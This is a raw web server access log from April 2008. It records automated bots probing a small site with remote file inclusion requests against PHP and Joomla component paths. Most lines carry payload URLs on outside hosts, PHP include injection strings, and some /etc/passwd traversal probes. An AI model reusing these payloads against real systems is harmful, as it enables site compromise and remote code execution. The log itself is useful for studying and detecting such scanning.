84.244.191.5 - - [23/Apr/2008:12:56:18 -0700] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:56:19 -0700] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.84.169 - - [23/Apr/2008:12:56:28 -0700] "GET /logs/access_080215.log/errors.php?error=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:12:56:43 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:56:44 -0700] "GET /logs/access_080228.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:56:44 -0700] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:56:44 -0700] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:12:57:08 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:12:57:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:12:57:09 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:57:11 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.96 - - [23/Apr/2008:12:57:14 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:57:14 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://redrumfans.com/id?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:57:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.11.215 - - [23/Apr/2008:12:57:15 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.159.68.165 - - [23/Apr/2008:12:57:31 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jentshin.new21.org/zboard_eng//data/cmd/inc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:58:28 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:58:30 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://redrumfans.com/id?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:58:30 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:12:58:37 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
221.6.101.22 - - [23/Apr/2008:12:59:48 -0700] "GET /logs/access_080320.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://g0tcha.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.6.101.22 - - [23/Apr/2008:12:59:49 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://g0tcha.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.6.101.22 - - [23/Apr/2008:12:59:50 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://g0tcha.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.223.154.131 - - [23/Apr/2008:12:59:56 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.219.217.74 - - [23/Apr/2008:13:00:02 -0700] "GET //errors.php?error=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [23/Apr/2008:13:00:18 -0700] "GET /logs/access.log/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [23/Apr/2008:13:00:18 -0700] "GET /errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [23/Apr/2008:13:00:19 -0700] "GET /logs/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
84.244.161.55 - - [23/Apr/2008:13:00:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
84.244.161.55 - - [23/Apr/2008:13:00:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:00:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:13:01:30 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.67.176 - - [23/Apr/2008:13:01:30 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:01:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:02:03 -0700] "GET / HTTP/1.1" 200 11606 "http://www.st-owners.com/forums/showthread.php?t=39671&goto=nextnewest" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:02:03 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
221.6.101.22 - - [23/Apr/2008:13:02:15 -0700] "GET /logs/access_080315.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://g0tcha.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:02:17 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:02:24 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:13:02:27 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:13:02:27 -0700] "GET //main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:13:02:27 -0700] "GET /logs//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:02:30 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:02:31 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:02:33 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:02:34 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:13:02:35 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:13:02:44 -0700] "GET /logs/access.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:13:02:45 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:13:02:45 -0700] "GET /logs//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:02:46 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:02:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:07 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:10 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
89.149.242.164 - - [23/Apr/2008:13:03:15 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://h1.ripway.com/scottcamposrj/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:13:03:15 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://h1.ripway.com/scottcamposrj/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:13:03:16 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:13:03:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.244.71.2 - - [23/Apr/2008:13:03:25 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:27 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:30 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 4254533 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:31 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:33 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:33 -0700] "GET /blog/wp-content/themes/default/images/kubrickbg.jpg HTTP/1.1" 200 1043 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:34 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:34 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:03:34 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:03:35 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.154.112.54 - - [23/Apr/2008:13:03:39 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
122.201.82.63 - - [23/Apr/2008:13:03:43 -0700] "GET /logs/access_080312.log/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.82.63 - - [23/Apr/2008:13:03:48 -0700] "GET /alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.82.63 - - [23/Apr/2008:13:03:53 -0700] "GET /logs/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.83.146 - - [23/Apr/2008:13:03:59 -0700] "GET //genlib.php?cms[tngpath]=http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.134.252.194 - - [23/Apr/2008:13:03:59 -0700] "GET //genlib.php?cms[tngpath]=http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.53.83.146 - - [23/Apr/2008:13:03:59 -0700] "GET /logs//genlib.php?cms[tngpath]=http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.134.252.194 - - [23/Apr/2008:13:03:59 -0700] "GET /logs//genlib.php?cms[tngpath]=http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.54.108.98 - - [23/Apr/2008:13:04:15 -0700] "GET //genlib.php?cms[tngpath]=http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
74.54.108.98 - - [23/Apr/2008:13:04:16 -0700] "GET /logs//genlib.php?cms[tngpath]=http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.106.11.23 - - [23/Apr/2008:13:04:28 -0700] "GET /logs/access_080302.log/index.php?pageurl=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.50.211.121 - - [23/Apr/2008:13:04:31 -0700] "GET /http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.11.23 - - [23/Apr/2008:13:04:32 -0700] "GET /index.php?pageurl=../../../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
69.50.211.121 - - [23/Apr/2008:13:04:32 -0700] "GET /logs/http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.11.23 - - [23/Apr/2008:13:04:34 -0700] "GET /logs/index.php?pageurl=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.221.240.132 - - [23/Apr/2008:13:04:34 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.238.250 - - [23/Apr/2008:13:04:43 -0700] "GET /logs/access_080329.log/index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.238.250 - - [23/Apr/2008:13:04:48 -0700] "GET /index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.238.250 - - [23/Apr/2008:13:04:51 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
221.6.101.22 - - [23/Apr/2008:13:05:42 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://g0tcha.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:05:42 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.17.20.250 - - [23/Apr/2008:13:05:45 -0700] "GET /logs/access.log//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.20.250 - - [23/Apr/2008:13:05:45 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.104.114 - - [23/Apr/2008:13:05:46 -0700] "GET /logs//errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:13:06:21 -0700] "GET /logs/access_080329.log/?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:13:06:24 -0700] "GET /?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:13:06:28 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:13:06:34 -0700] "GET /logs/?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [23/Apr/2008:13:06:45 -0700] "GET /logs/access_080215.log/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:13:07:06 -0700] "GET //config/dbutil.bck.php?confdir=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:13:07:06 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:13:07:08 -0700] "GET /logs/access.log/?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.185.17 - - [23/Apr/2008:13:07:30 -0700] "GET //config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/scottcamposrj/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.249.185.17 - - [23/Apr/2008:13:07:30 -0700] "GET /logs//config.inc.php?config%5broot_dir%5d=http://h1.ripway.com/scottcamposrj/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:13:07:38 -0700] "GET //errors.php?error=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:08:01 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:13:08:04 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.65" "www.dmulk.com"
